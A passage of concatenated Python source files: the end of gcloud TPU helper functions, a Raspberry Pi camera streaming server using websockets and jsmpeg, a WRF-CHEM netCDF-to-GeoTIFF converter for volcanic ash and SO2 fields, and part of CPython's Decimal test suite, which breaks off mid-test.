delete", parse_tpu_id(tpu), zone=zone, quiet=True, ) def reimage_tpu_command(tpu, version=None): if version is None: version = parse_tpu_version(tpu) return build_commandline("gcloud compute tpus reimage", parse_tpu_id(tpu), zone=parse_tpu_zone(tpu), version=version, quiet=True, )
server.py
#!/usr/bin/env python import sys import io import os import shutil from subprocess import Popen, PIPE from string import Template from struct import Struct from threading import Thread from time import sleep, time from http.server import HTTPServer, BaseHTTPRequestHandler from wsgiref.simple_server import make_server import picamera from ws4py.websocket import WebSocket from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler from ws4py.server.wsgiutils import WebSocketWSGIApplication ########################################### # CONFIGURATION WIDTH = 1280 HEIGHT = 960 FRAMERATE = 24 HTTP_PORT = 8082 WS_PORT = 8084 COLOR = u'#444' BGCOLOR = u'#333' JSMPEG_MAGIC = b'jsmp' JSMPEG_HEADER = Struct('>4sHH') ########################################### class StreamingHttpHandler(BaseHTTPRequestHandler): def do_HEAD(self): self.do_GET() def do_GET(self): if self.path == '/': self.send_response(301) self.send_header('Location', '/index.html') self.end_headers() return elif self.path == '/jsmpg.js': content_type = 'application/javascript' content = self.server.jsmpg_content elif self.path == '/index.html': content_type = 'text/html; charset=utf-8' tpl = Template(self.server.index_template) content = tpl.safe_substitute(dict( ADDRESS='%s:%d' % (self.request.getsockname()[0], WS_PORT), WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR, BGCOLOR=BGCOLOR)) else: self.send_error(404, 'File not found') return content = content.encode('utf-8') self.send_response(200) self.send_header('Content-Type', content_type) self.send_header('Content-Length', len(content)) self.send_header('Last-Modified', self.date_time_string(time())) self.end_headers() if self.command == 'GET': self.wfile.write(content) class StreamingHttpServer(HTTPServer): def __init__(self): super(StreamingHttpServer, self).__init__( ('', HTTP_PORT), StreamingHttpHandler) with io.open('index.html', 'r') as f: self.index_template = f.read() with io.open('jsmpg.js', 'r') as f: self.jsmpg_content = f.read() class StreamingWebSocket(WebSocket): def opened(self): self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True) class BroadcastOutput(object): def __init__(self, camera): print('Spawning background conversion process') self.converter = Popen([ 'avconv', '-f', 'rawvideo', '-pix_fmt', 'yuv420p', '-s', '%dx%d' % camera.resolution, '-r', str(float(camera.framerate)), '-i', '-', '-f', 'mpeg1video', '-b', '3200k', '-r', str(float(camera.framerate)), '-'], stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'), shell=False, close_fds=True) def write(self, b): self.converter.stdin.write(b) def flush(self): print('Waiting for background conversion process to exit') self.converter.stdin.close() self.converter.wait() class BroadcastThread(Thread): def __init__(self, converter, websocket_server): super(BroadcastThread, self).__init__() self.converter = converter self.websocket_server = websocket_server def run(self): try: while True: buf = self.converter.stdout.read(512) if buf: self.websocket_server.manager.broadcast(buf, binary=True) elif self.converter.poll() is not None: break finally: self.converter.stdout.close() def main(): print('Initializing camera') with picamera.PiCamera() as camera: camera.resolution = (WIDTH, HEIGHT) camera.framerate = FRAMERATE camera.hflip = True camera.vflip = True sleep(1) # camera warm-up time print('Initializing websockets server on port %d' % WS_PORT) websocket_server = make_server( '', WS_PORT, server_class=WSGIServer, handler_class=WebSocketWSGIRequestHandler, app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket)) websocket_server.initialize_websockets_manager() websocket_thread = Thread(target=websocket_server.serve_forever) print('Initializing HTTP server on port %d' % HTTP_PORT) http_server = StreamingHttpServer() http_thread = Thread(target=http_server.serve_forever) print('Initializing broadcast thread') output = BroadcastOutput(camera) broadcast_thread = BroadcastThread(output.converter, websocket_server) print('Starting recording') camera.start_recording(output, 'yuv') try: print('Starting websockets thread') websocket_thread.start() print('Starting HTTP server thread') http_thread.start() print('Starting broadcast thread') broadcast_thread.start() while True: camera.wait_recording(1) except KeyboardInterrupt: pass finally: print('Stopping recording') camera.stop_recording() print('Waiting for broadcast thread to finish') broadcast_thread.join() print('Shutting down HTTP server') http_server.shutdown() print('Shutting down websockets server') websocket_server.shutdown() print('Waiting for HTTP server thread to finish') http_thread.join() print('Waiting for websockets thread to finish') websocket_thread.join() if __name__ == '__main__': main()
procWRFCHEM.py
#!/usr/bin/env python import os, sys, subprocess import gdal import multiprocessing import numpy as np import time as tt from netCDF4 import Dataset from osgeo import osr from os.path import basename def extract_product(fileAbsPath, field, pixelSize=0.10): ncfile = Dataset(fileAbsPath, 'r') data = ncfile.variables[field][:] time = ncfile.variables['Times'][:] lon = ncfile.variables['XLONG'][:] lat = ncfile.variables['XLAT'][:] if field != 'vashcol_sat_col': ph = ncfile.variables['PH'][:] phb = ncfile.variables['PHB'][:] hgt = ncfile.variables['HGT'][:] is_volume = True else: data = np.expand_dims(data, axis=1) is_volume = False ncfile.close() xSize = data.shape[3] ySize = data.shape[2] numBands = data.shape[1] driver = gdal.GetDriverByName('GTiff') no_data = -9999 if field == 'vashcol_sat_col' or field == 'vash_al': field = 'EYJA_' + field field = field.upper() dateStr = basename(fileAbsPath)[11:21] coordsFilename = 'WRF-CHEM_coords_' + field + dateStr + '.tif' coord_ds = driver.Create(coordsFilename, xSize, ySize, 2, gdal.GDT_Float32) coord_ds.GetRasterBand(1).WriteArray(lat[0]) coord_ds.GetRasterBand(2).WriteArray(lon[0]) coord_ds = None prefix = 'WRFCHEM_' + field + basename(fileAbsPath)[6:11].upper() outFileList = [] upper_left = [] lower_right = [] upper_left.append(np.amax(lat[0][:][:])) upper_left.append(np.amin(lon[0][:][:])) lower_right.append(np.amin(lat[0][:][:])) lower_right.append(np.amax(lon[0][:][:])) tmpOutFile = prefix + dateStr + '_tmp.tif' dst_ds = driver.Create(tmpOutFile, xSize, ySize, 1, gdal.GDT_Float32) dst_ds.GetRasterBand(1).WriteArray(np.squeeze(data[0][0][:][:])) dst_ds = None workingDir = os.path.dirname(os.path.realpath(__file__)) + '/../' command_call = [workingDir + 'bin/remap', '-i', tmpOutFile, '-l', str(upper_left[0]), str(upper_left[1]), '-e', str(lower_right[0]), str(lower_right[1]), '-a', coordsFilename, '-s', str(pixelSize), '-n', str(no_data), '-q', '-o', tmpOutFile + '_mask'] mask_process = subprocess.Popen(command_call, stdout=open(os.devnull, 'wb')) command_call.pop() command_call.append(tmpOutFile + '_remapped') command_call.append('-c') coord_process = subprocess.Popen(command_call, stdout=open(os.devnull, 'wb')) coord_process.wait() mask_process.wait() remap_ds = gdal.Open(tmpOutFile + '_remapped', gdal.GA_ReadOnly) transform_i = remap_ds.GetRasterBand(1).ReadAsArray().transpose() transform_j = remap_ds.GetRasterBand(2).ReadAsArray().transpose() mask_ds = gdal.Open(tmpOutFile + '_mask', gdal.GA_ReadOnly) mask = mask_ds.GetRasterBand(1).ReadAsArray().transpose() for t in range(0, len(time)): dateStr = '' for i in range(0, len(time[t]) - 3): if time[t][i] == ':' or time[t][i] == '-' or time[t][i] == '_': continue dateStr += time[t][i] dateStr += '00' dateStr = dateStr[:8] + '.' + dateStr[8:] outFilename = prefix + dateStr + '.tif' dst_ds = driver.Create(outFilename, transform_j.shape[0], transform_j.shape[1], numBands, gdal.GDT_Float32) height = np.zeros([numBands, ySize, xSize]) heightLevels = [] for l in range(numBands): outData = np.ones([transform_j.shape[0], transform_j.shape[1]]) * no_data if is_volume: height[l][:][:] = ((ph[t][l][:][:] + phb[t][l][:][:]) / 9.81) - hgt[t][:][:] avg = np.average(height[l][:][:]) if avg < 0: avg = 0 heightLevels.append(avg) for i in range(outData.shape[0]): for j in range(outData.shape[1]): outData[i, j] = data[t, l, transform_j[i,j], transform_i[i,j]] outData[mask==no_data] = no_data dst_ds.GetRasterBand(numBands - l).SetNoDataValue(no_data) dst_ds.GetRasterBand(numBands - l).WriteArray(outData.transpose()) dst_ds.GetRasterBand(numBands - l).ComputeStatistics(False) dst_ds.SetGeoTransform([upper_left[1], pixelSize, 0, upper_left[0], 0, -pixelSize]) srs = osr.SpatialReference() srs.SetWellKnownGeogCS('WGS84') dst_ds.SetProjection(srs.ExportToWkt()) dst_ds.SetMetadataItem('GLOBAL_MAX', str(np.max(data))) dst_ds.SetMetadataItem('GLOBAL_MIN', str(np.min(data))) date = dateStr[0:4] + '-' + dateStr[4:6] + '-' + dateStr[6:8] hours = dateStr[9:11] minutes = dateStr[11:13] seconds = '00' formatedDate = date + 'T' + hours + ':' + minutes + ':' + seconds + 'Z' dst_ds.SetMetadataItem('TIME_END', formatedDate) dst_ds.SetMetadataItem('TIME_START', formatedDate) if is_volume: dst_ds.SetMetadataItem('VERTICAL_LEVELS_NUMBER', str(len(heightLevels))) dst_ds.SetMetadataItem('VERTICAL_LEVELS', str(heightLevels).replace(' ', '')[1:-1]) dst_ds = None outFileList.append(outFilename) os.remove(coordsFilename) os.remove(tmpOutFile) os.remove(tmpOutFile + '_remapped') os.remove(tmpOutFile + '_mask') return outFileList def createImgWRFCHEM_SO2(fileAbsPath): return extract_product(fileAbsPath, 'so2') def createImgWRFCHEM_ASH3D(fileAbsPath): return extract_product(fileAbsPath, 'vash_al') def createImgWRFCHEM_ASHCOL(fileAbsPath): return extract_product(fileAbsPath, 'vashcol_sat_col') if __name__ == '__main__': if len(sys.argv) < 2: sys.exit('\nUsage: %s WRF-CHEM_file(s) \n' % sys.argv[0]) files = sys.argv[1:] fields = ['vash_al', 'vashcol_sat_col', 'so2'] #number of concurrent processes, it's 3 in order to avoid running out of memory active_processes = 3 active_jobs = [] joblist = [] for file in files: if not os.path.exists(file): print '\nERROR: File %s was not found!\n' % file continue if file[-6:] == 'vash3d': field = 'vash_al' elif file[-7:] == 'vashcol': field = 'vashcol_sat_col' else: field = 'so2' p = multiprocessing.Process(target=extract_product, args=(file, field)) joblist.append((p, file, tt.time())) while joblist or active_jobs: for job in joblist: if len(active_jobs) < active_processes: job[0].start() joblist.remove(job) active_jobs.append(job) continue for job in active_jobs: if not job[0].is_alive(): print 'Finished processing for {0}, took: {1:5.1f}s'.format(job[1], tt.time()-job[2]) active_jobs.remove(job) continue tt.sleep(0.5) exit(0)
test_decimal.py
# Copyright (c) 2004 Python Software Foundation. # All rights reserved. # Written by Eric Price <eprice at tjhsst.edu> # and Facundo Batista <facundo at taniquetil.com.ar> # and Raymond Hettinger <python at rcn.com> # and Aahz (aahz at pobox.com) # and Tim Peters """ These are the test cases for the Decimal module. There are two groups of tests, Arithmetic and Behaviour. The former test the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter test the pythonic behaviour according to PEP 327. Cowlishaw's tests can be downloaded from: http://speleotrove.com/decimal/dectest.zip This test module can be called from command line with one parameter (Arithmetic or Behaviour) to test each part, or without parameter to test both parts. If you're working through IDLE, you can import this test module and call test_main() with the corresponding argument. """ import math import os, sys import operator import warnings import pickle, copy import unittest import numbers import locale from test.support import (run_unittest, run_doctest, is_resource_enabled, requires_IEEE_754, requires_docstrings) from test.support import (TestFailed, run_with_locale, cpython_only) from test.support.import_helper import import_fresh_module import random import inspect import threading C = import_fresh_module('decimal', fresh=['_decimal']) P = import_fresh_module('decimal', blocked=['_decimal']) orig_sys_decimal = sys.modules['decimal'] # fractions module must import the correct decimal module. cfractions = import_fresh_module('fractions', fresh=['fractions']) sys.modules['decimal'] = P pfractions = import_fresh_module('fractions', fresh=['fractions']) sys.modules['decimal'] = C fractions = {C:cfractions, P:pfractions} sys.modules['decimal'] = orig_sys_decimal # Useful Test Constant Signals = { C: tuple(C.getcontext().flags.keys()) if C else None, P: tuple(P.getcontext().flags.keys()) } # Signals ordered with respect to precedence: when an operation # produces multiple signals, signals occurring later in the list # should be handled before those occurring earlier in the list. OrderedSignals = { C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow, C.Overflow, C.DivisionByZero, C.InvalidOperation, C.FloatOperation] if C else None, P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow, P.Overflow, P.DivisionByZero, P.InvalidOperation, P.FloatOperation] } def assert_signals(cls, context, attr, expected): d = getattr(context, attr) cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d)) ROUND_UP = P.ROUND_UP ROUND_DOWN = P.ROUND_DOWN ROUND_CEILING = P.ROUND_CEILING ROUND_FLOOR = P.ROUND_FLOOR ROUND_HALF_UP = P.ROUND_HALF_UP ROUND_HALF_DOWN = P.ROUND_HALF_DOWN ROUND_HALF_EVEN = P.ROUND_HALF_EVEN ROUND_05UP = P.ROUND_05UP RoundingModes = [ ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR, ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_05UP ] # Tests are built around these assumed context defaults. # test_main() restores the original context. ORIGINAL_CONTEXT = { C: C.getcontext().copy() if C else None, P: P.getcontext().copy() } def init(m): if not m: return DefaultTestContext = m.Context( prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0) ) m.setcontext(DefaultTestContext) TESTDATADIR = 'decimaltestdata' if __name__ == '__main__': file = sys.argv[0] else: file = __file__ testdir = os.path.dirname(file) or os.curdir directory = testdir + os.sep + TESTDATADIR + os.sep skip_expected = not os.path.isdir(directory) # Make sure it actually raises errors when not expected and caught in flags # Slower, since it runs some things several times. EXTENDEDERRORTEST = False # Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY). EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False requires_extra_functionality = unittest.skipUnless( EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY") skip_if_extra_functionality = unittest.skipIf( EXTRA_FUNCTIONALITY, "test requires regular build") class IBMTestCases(unittest.TestCase): """Class which tests the Decimal class against the IBM test cases.""" def setUp(self): self.context = self.decimal.Context() self.readcontext = self.decimal.Context() self.ignore_list = ['#'] # List of individual .decTest test ids that correspond to tests that # we're skipping for one reason or another. self.skipped_test_ids = set([ # Skip implementation-specific scaleb tests. 'scbx164', 'scbx165', # For some operations (currently exp, ln, log10, power), the decNumber # reference implementation imposes additional restrictions on the context # and operands. These restrictions are not part of the specification; # however, the effect of these restrictions does show up in some of the # testcases. We skip testcases that violate these restrictions, since # Decimal behaves differently from decNumber for these testcases so these # testcases would otherwise fail. 'expx901', 'expx902', 'expx903', 'expx905', 'lnx901', 'lnx902', 'lnx903', 'lnx905', 'logx901', 'logx902', 'logx903', 'logx905', 'powx1183', 'powx1184', 'powx4001', 'powx4002', 'powx4003', 'powx4005', 'powx4008', 'powx4010', 'powx4012', 'powx4014', ]) if self.decimal == C: # status has additional Subnormal, Underflow self.skipped_test_ids.add('pwsx803') self.skipped_test_ids.add('pwsx805') # Correct rounding (skipped for decNumber, too) self.skipped_test_ids.add('powx4302') self.skipped_test_ids.add('powx4303') self.skipped_test_ids.add('powx4342') self.skipped_test_ids.add('powx4343') # http://bugs.python.org/issue7049 self.skipped_test_ids.add('pwmx325') self.skipped_test_ids.add('pwmx326') # Map test directives to setter functions. self.ChangeDict = {'precision' : self.change_precision, 'rounding' : self.change_rounding_method, 'maxexponent' : self.change_max_exponent, 'minexponent' : self.change_min_exponent, 'clamp' : self.change_clamp} # Name adapter to be able to change the Decimal and Context # interface without changing the test files from Cowlishaw. self.NameAdapter = {'and':'logical_and', 'apply':'_apply', 'class':'number_class', 'comparesig':'compare_signal', 'comparetotal':'compare_total', 'comparetotmag':'compare_total_mag', 'copy':'copy_decimal', 'copyabs':'copy_abs', 'copynegate':'copy_negate', 'copysign':'copy_sign', 'divideint':'divide_int', 'invert':'logical_invert', 'iscanonical':'is_canonical', 'isfinite':'is_finite', 'isinfinite':'is_infinite', 'isnan':'is_nan', 'isnormal':'is_normal', 'isqnan':'is_qnan', 'issigned':'is_signed', 'issnan':'is_snan', 'issubnormal':'is_subnormal', 'iszero':'is_zero', 'maxmag':'max_mag', 'minmag':'min_mag', 'nextminus':'next_minus', 'nextplus':'next_plus', 'nexttoward':'next_toward', 'or':'logical_or', 'reduce':'normalize', 'remaindernear':'remainder_near', 'samequantum':'same_quantum', 'squareroot':'sqrt', 'toeng':'to_eng_string', 'tointegral':'to_integral_value', 'tointegralx':'to_integral_exact', 'tosci':'to_sci_string', 'xor':'logical_xor'} # Map test-case names to roundings. self.RoundingDict = {'ceiling' : ROUND_CEILING, 'down' : ROUND_DOWN, 'floor' : ROUND_FLOOR, 'half_down' : ROUND_HALF_DOWN, 'half_even' : ROUND_HALF_EVEN, 'half_up' : ROUND_HALF_UP, 'up' : ROUND_UP, '05up' : ROUND_05UP} # Map the test cases' error names to the actual errors. self.ErrorNames = {'clamped' : self.decimal.Clamped, 'conversion_syntax' : self.decimal.InvalidOperation, 'division_by_zero' : self.decimal.DivisionByZero, 'division_impossible' : self.decimal.InvalidOperation, 'division_undefined' : self.decimal.InvalidOperation, 'inexact' : self.decimal.Inexact, 'invalid_context' : self.decimal.InvalidOperation, 'invalid_operation' : self.decimal.InvalidOperation, 'overflow' : self.decimal.Overflow, 'rounded' : self.decimal.Rounded, 'subnormal' : self.decimal.Subnormal, 'underflow' : self.decimal.Underflow} # The following functions return True/False rather than a # Decimal instance. self.LogicalFunctions = ('is_canonical', 'is_finite', 'is_infinite', 'is_nan', 'is_normal', 'is_qnan', 'is_signed', 'is_snan', 'is_subnormal', 'is_zero', 'same_quantum') def read_unlimited(self, v, context): """Work around the limitations of the 32-bit _decimal version. The guaranteed maximum values for prec, Emax etc. are 425000000, but higher values usually work, except for rare corner cases. In particular, all of the IBM tests pass with maximum values of 1070000000.""" if self.decimal == C and self.decimal.MAX_EMAX == 425000000: self.readcontext._unsafe_setprec(1070000000) self.readcontext._unsafe_setemax(1070000000) self.readcontext._unsafe_setemin(-1070000000) return self.readcontext.create_decimal(v) else: return self.decimal.Decimal(v, context) def eval_file(self, file): global skip_expected if skip_expected: raise unittest.SkipTest with open(file) as f: for line in f: line = line.replace('\r\n', '').replace('\n', '') #print line try: t = self.eval_line(line) except self.decimal.DecimalException as exception: #Exception raised where there shouldn't have been one. self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line) def eval_line(self, s): if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'): s = (s.split('->')[0] + '->' + s.split('->')[1].split('--')[0]).strip() else: s = s.split('--')[0].strip() for ignore in self.ignore_list: if s.find(ignore) >= 0: #print s.split()[0], 'NotImplemented--', ignore return if not s: return elif ':' in s: return self.eval_directive(s) else: return self.eval_equation(s) def eval_directive(self, s): funct, value = (x.strip().lower() for x in s.split(':')) if funct == 'rounding': value = self.RoundingDict[value] else: try: value = int(value) except ValueError: pass funct = self.ChangeDict.get(funct, (lambda *args: None)) funct(value) def eval_equation(self, s): if not TEST_ALL and random.random() < 0.90: return self.context.clear_flags() try: Sides = s.split('->') L = Sides[0].strip().split() id = L[0] if DEBUG: print("Test ", id, end=" ") funct = L[1].lower() valstemp = L[2:] L = Sides[1].strip().split() ans = L[0] exceptions = L[1:] except (TypeError, AttributeError, IndexError): raise self.decimal.InvalidOperation def FixQuotes(val): val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote') val = val.replace("'", '').replace('"', '') val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"') return val if id in self.skipped_test_ids: return fname = self.NameAdapter.get(funct, funct) if fname == 'rescale': return funct = getattr(self.context, fname) vals = [] conglomerate = '' quote = 0 theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions] for exception in Signals[self.decimal]: self.context.traps[exception] = 1 #Catch these bugs... for exception in theirexceptions: self.context.traps[exception] = 0 for i, val in enumerate(valstemp): if val.count("'") % 2 == 1: quote = 1 - quote if quote: conglomerate = conglomerate + ' ' + val continue else: val = conglomerate + val conglomerate = '' v = FixQuotes(val) if fname in ('to_sci_string', 'to_eng_string'): if EXTENDEDERRORTEST: for error in theirexceptions: self.context.traps[error] = 1 try: funct(self.context.create_decimal(v)) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s when %s disabled" % \ (e, s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) self.context.traps[error] = 0 v = self.context.create_decimal(v) else: v = self.read_unlimited(v, self.context) vals.append(v) ans = FixQuotes(ans) if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'): for error in theirexceptions: self.context.traps[error] = 1 try: funct(*vals) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s when %s disabled" % \ (e, s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) self.context.traps[error] = 0 # as above, but add traps cumulatively, to check precedence ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions] for error in ordered_errors: self.context.traps[error] = 1 try: funct(*vals) except error: pass except Signals[self.decimal] as e: self.fail("Raised %s in %s; expected %s" % (type(e), s, error)) else: self.fail("Did not raise %s in %s" % (error, s)) # reset traps for error in ordered_errors: self.context.traps[error] = 0 if DEBUG: print("--", self.context) try: result = str(funct(*vals)) if fname in self.LogicalFunctions: result = str(int(eval(result))) # 'True', 'False' -> '1', '0' except Signals[self.decimal] as error: self.fail("Raised %s in %s" % (error, s)) except: #Catch any error long enough to state the test case. print("ERROR:", s) raise myexceptions = self.getexceptions() myexceptions.sort(key=repr) theirexceptions.sort(key=repr) self.assertEqual(result, ans, 'Incorrect answer for ' + s + ' -- got ' + result) self.assertEqual(myexceptions, theirexceptions, 'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions)) def getexceptions(self): return [e for e in Signals[self.decimal] if self.context.flags[e]] def change_precision(self, prec): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setprec(prec) else: self.context.prec = prec def change_rounding_method(self, rounding): self.context.rounding = rounding def change_min_exponent(self, exp): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setemin(exp) else: self.context.Emin = exp def change_max_exponent(self, exp): if self.decimal == C and self.decimal.MAX_PREC == 425000000: self.context._unsafe_setemax(exp) else: self.context.Emax = exp def change_clamp(self, clamp): self.context.clamp = clamp class CIBMTestCases(IBMTestCases): decimal = C class PyIBMTestCases(IBMTestCases): decimal = P # The following classes test the behaviour of Decimal according to PEP 327 class ExplicitConstructionTest(unittest.TestCase): '''Unit tests for Explicit Construction cases of Decimal.''' def test_explicit_empty(self): Decimal = self.decimal.Decimal self.assertEqual(Decimal(), Decimal("0")) def test_explicit_from_None(self): Decimal = self.decimal.Decimal self.assertRaises(TypeError, Decimal, None) def test_explicit_from_int(self): Decimal = self.decimal.Decimal #positive d = Decimal(45) self.assertEqual(str(d), '45') #very large positive d = Decimal(500000123) self.assertEqual(str(d), '500000123') #negative d = Decimal(-45) self.assertEqual(str(d), '-45') #zero d = Decimal(0) self.assertEqual(str(d), '0') # single word longs for n in range(0, 32): for sign in (-1, 1): for x in range(-5, 5): i = sign * (2**n + x) d = Decimal(i) self.assertEqual(str(d), str(i)) def test_explicit_from_string(self): Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation localcontext = self.decimal.localcontext #empty self.assertEqual(str(Decimal('')), 'NaN') #int self.assertEqual(str(Decimal('45')), '45') #float self.assertEqual(str(Decimal('45.34')), '45.34') #engineer notation self.assertEqual(str(Decimal('45e2')), '4.5E+3') #just not a number self.assertEqual(str(Decimal('ugly')), 'NaN') #leading and trailing whitespace permitted self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4') self.assertEqual(str(Decimal(' -7.89')), '-7.89') self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679') # underscores self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41') self.assertEqual(str(Decimal('1_0_0_0')), '1000') # unicode whitespace for lead in ["", ' ', '\u00a0', '\u205f']: for trail in ["", ' ', '\u00a0', '\u205f']: self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)), '9.311E+28') with localcontext() as c: c.traps[InvalidOperation] = True # Invalid string self.assertRaises(InvalidOperation, Decimal, "xyz") # Two arguments max self.assertRaises(TypeError, Decimal, "1234", "x", "y") # space within the numeric part self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03") self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0") # unicode whitespace self.assertRaises(InvalidOperation, Decimal, "\u00a0") self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0") # embedded NUL self.assertRaises(InvalidOperation, Decimal, "12\u00003") # underscores don't prevent errors self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003") @cpython_only def test_from_legacy_strings(self): import _testcapi Decimal = self.decimal.Decimal context = self.decimal.Context() s = _testcapi.unicode_legacy_string('9.999999') self.assertEqual(str(Decimal(s)), '9.999999') self.assertEqual(str(context.create_decimal(s)), '9.999999') def test_explicit_from_tuples(self): Decimal = self.decimal.Decimal #zero d = Decimal( (0, (0,), 0) ) self.assertEqual(str(d), '0') #int d = Decimal( (1, (4, 5), 0) ) self.assertEqual(str(d), '-45') #float d = Decimal( (0, (4, 5, 3, 4), -2) ) self.assertEqual(str(d), '45.34') #weird d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(str(d), '-4.34913534E-17') #inf d = Decimal( (0, (), "F") ) self.assertEqual(str(d), 'Infinity') #wrong number of items self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) ) #bad sign self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2)) #bad exp self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') ) #bad coefficients self.assertRaises(ValueError, Decimal, (1, "xyz", 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) ) self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) ) def test_explicit_from_list(self): Decimal = self.decimal.Decimal d = Decimal([0, [0], 0]) self.assertEqual(str(d), '0') d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25]) self.assertEqual(str(d), '-4.34913534E-17') d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25]) self.assertEqual(str(d), '-4.34913534E-17') d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25)) self.assertEqual(str(d), '-4.34913534E-17') def test_explicit_from_bool(self): Decimal = self.decimal.Decimal self.assertIs(bool(Decimal(0)), False) self.assertIs(bool(Decimal(1)), True) self.assertEqual(Decimal(False), Decimal(0)) self.assertEqual(Decimal(True), Decimal(1)) def test_explicit_from_Decimal(self): Decimal = self.decimal.Decimal #positive d = Decimal(45) e = Decimal(d) self.assertEqual(str(e), '45') #very large positive d = Decimal(500000123) e = Decimal(d) self.assertEqual(str(e), '500000123') #negative d = Decimal(-45) e = Decimal(d) self.assertEqual(str(e), '-45') #zero d = Decimal(0) e = Decimal(d) self.assertEqual(str(e), '0') @requires_IEEE_754 def test_explicit_from_float(self): Decimal = self.decimal.Decimal r = Decimal(0.1) self.assertEqual(type(r), Decimal) self.assertEqual(str(r), '0.1000000000000000055511151231257827021181583404541015625') self.assertTrue(Decimal(float('nan')).is_qnan()) self.assertTrue(Decimal(float('inf')).is_infinite()) self.assertTrue(Decimal(float('-inf')).is_infinite()) self.assertEqual(str(Decimal(float('nan'))), str(Decimal('NaN'))) self.assertEqual(str(Decimal(float('inf'))), str(Decimal('Infinity'))) self.assertEqual(str(Decimal(float('-inf'))), str(Decimal('-Infinity'))) self.assertEqual(str(Decimal(float('-0.0'))), str(Decimal('-0'))) for i in range(200): x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0) self.assertEqual(x, float(Decimal(x))) # roundtrip def test_explicit_context_create_decimal(self): Decimal = self.decimal.Decimal InvalidOperation = self.decimal.InvalidOperation Rounded = self.decimal.Rounded nc = copy.copy(self.decimal.getcontext()) nc.prec = 3 # empty d = Decimal() self.assertEqual(str(d), '0') d = nc.create_decimal() self.assertEqual(str(d), '0') # from None self.assertRaises(TypeError, nc.create_decimal, None) # from int d = nc.create_decimal(456) self.assertIsInstance(d, Decimal) self.assertEqual(nc.create_decimal(45678), nc.create_decimal('457E+2')) # from string d = Decimal('456789') self.assertEqual(str(d), '456789') d = nc.create_decimal('456789') self.assertEqual(str(d), '4.57E+5') # leading and trailing whitespace should result in a NaN; # spaces are already checked in Cowlishaw's test-suite, so # here we just check that a trailing newline results in a NaN self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN') # from tuples d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(str(d), '-4.34913534E-17') d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) ) self.assertEqual(str(d), '-4.35E-17') # from Decimal prevdec = Decimal(500000123) d = Decimal(prevdec) self.assertEqual(str(d), '500000123') d = nc.create_decimal(prevdec) self.assertEqual(str(d), '5.00E+8') # more integers nc.prec = 28 nc.traps[InvalidOperation] = True for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0, 2**31-1, 2**31, 2**63-1, 2**63]: d = nc.create_decimal(v) self.assertTrue(isinstance(d, Decimal)) self.assertEqual(int(d), v) nc.prec = 3 nc.traps[Rounded] = True self.assertRaises(Rounded, nc.create_decimal, 1234) # from string nc.prec = 28 self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17') self.assertEqual(str(nc.create_decimal('45')), '45') self.assertEqual(str(nc.create_decimal('-Inf')), 